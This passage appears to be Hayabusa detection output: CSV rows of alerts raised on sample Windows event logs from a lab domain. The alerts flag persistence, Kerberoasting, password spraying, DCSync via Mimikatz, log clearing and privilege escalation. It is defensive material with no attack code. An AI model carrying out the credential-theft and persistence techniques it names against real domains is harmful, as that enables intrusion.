account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: 
Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : 
SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: 
CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 
+09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to local Domain Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain 
Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! 
(Possible Backdoor),User: FAKE-COMPUTER$ : SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx +2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx +2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.434 
+09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: 172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: ::ffff:172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx +2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD 
User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes 
accessed.evtx +2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: : Service: : IP Address: ::ffff:10.23.23.9 : Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service 
Ticket Requested,User: admmig@OFFSEC.LAN : Service: Svc-SQL-DB01 : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:54.999 
+09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55733 : LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 58736 : LogonID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$ : Workstation: - : IP Address: 10.23.42.18 : Port: 
